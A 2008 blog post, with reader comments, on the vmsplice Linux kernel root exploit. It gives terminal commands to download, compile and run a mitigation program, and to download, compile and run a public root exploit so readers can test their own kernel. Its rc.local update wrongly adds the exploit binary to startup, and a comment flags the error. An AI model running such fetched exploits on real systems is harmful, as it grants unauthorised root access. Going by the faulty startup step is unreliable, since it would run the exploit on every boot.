Feb 11, 2008

UBUNTU: vmsplice exploit fix!

I was shocked when i receive an alert from kagesenshi at #myoss freenode.net regarding the kernel exploit which affected kernel 2.6.17 to 2.6.24. So I tried the exploit and in a split second, I got a root access without need to put any password nor sudo command.

What an exploit! actually the exploit do take advantage on splice code use by kernel to gain root access. Ubuntu dev team currently working to release a kernel patch as soon as possible, but either way you need to patch your current kernel before the official patch is release.

Here is the step to patch your kernel:
  • Open up terminal:
    • wget http://forums.ubuntu.com.my/forumfiles/disable-vmsplice-if-exploitable.c
    • cc -o patch disable-vmsplice-if-exploitable.c
    • ./patch
  • And you're done patching.
But if in a way you would like to test your kernel before patching, here is the guide to exploit your own kernel:
  • Open up terminal:
    • wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
    • cc -o exploits 27704.c
    • ./exploits
  • And you will have the root. If you not gaining any root access, it means that your kernel is not affected and no need to patch.
  • ****UPDATE****
  • You need to apply it on every session as the patch is run on the active session only. So to make it run on every session even after rebooting your box/desktop/laptop, you need to put it on your rc.local script. To do this:
    • sudo mv exploits patch /usr/bin/
    • sudo nano /etc/rc.local
    • add the following line before "exit 0"
      • /usr/bin/exploits sh /usr/bin/patch
    • So it will run on every startup until the kernel update is release.
It's all from now. Any difficulties regarding the tutorial here please leave a comment.

Thank you for your unbelievable support on Negative Zero - Permission to read and write blog for nearly 4 years. Don't forget to like Negative Zero on Facebook.
Blogirific.com Blog Directory

Post(s) you might like to read :


  1. thank you very much,
    this was quite useful!

  2. That C code to plug the vmsplice exploit contains assembler. That seems to suggest it is only valid on i386 kernels?

  3. do you mean mv patch to /usr/bin not to move the exploit to /usr/bin?

  4. sorry,
    I didnt detect the error there.
    yeah, surely move the patch and not the exploits!

    I'll make the update.
    thanks for the info mate!